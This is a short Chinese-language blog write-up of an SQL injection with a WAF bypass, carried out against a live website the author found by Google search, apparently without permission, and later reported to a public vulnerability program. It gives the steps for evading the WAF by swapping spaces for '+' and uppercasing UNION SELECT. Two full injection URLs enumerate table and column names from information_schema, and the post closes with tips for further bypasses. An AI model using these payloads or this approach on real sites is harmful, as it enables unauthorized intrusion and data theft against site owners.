一次簡單的SQL隱碼攻擊繞WAF

堅持一年吧!發表於2021-10-18

本人也是小白一枚,大佬請繞過,這個其實是六月份的時候做的,那時候想多點實戰經驗,就直接用谷歌搜尋找了一些網站,這個是其中一個

1、目標網站

 

2、發現有WAF防護

 

 

3、判斷存在注入

 

 

 4、猜測了一下閉合為",果真是"閉合,而且沒有觸發WAF,感覺還挺幸運的

 

 

 5、嘗試使用 order by判斷當前資料庫的欄位數為20,本來以為WAF會攔截,發現也沒有攔截

 

 

 6、判斷顯示位,這次直接被攔截了

 

 

 7、繞WAF,通過使用(+)代替空格的方法繞過WAF的攔截,並大寫UNION SELECT,判斷出顯錯點為5和10

 

 

  8、查詢資料庫使用者名稱和資料庫名

 

 

 9、查詢當前資料庫表名,列名

查詢表名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

+from+information_schema.tables+where+table_schema=database()+%23

 

 

 

查詢列名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

+from+information_schema.columns+where+table_name=%27s1_ad1%27+limit+1,1%20+%23

 

 

 點到為止嘛沒有繼續下去了,然後直接交公益src了,其實顯錯點10也可以同顯錯點5一樣的操作查詢處庫名錶名列名到最後的欄位內容,還可以用group_concat()這個函式查詢出多個資料庫名,不過試了一下WAF攔截了,可以嘗試替換等價函式或者其他方法啊應該也是可以繞過WAF的,不行的話,也可以嘗試用burp抓包跑出表名,列名,欄位名

 

相關文章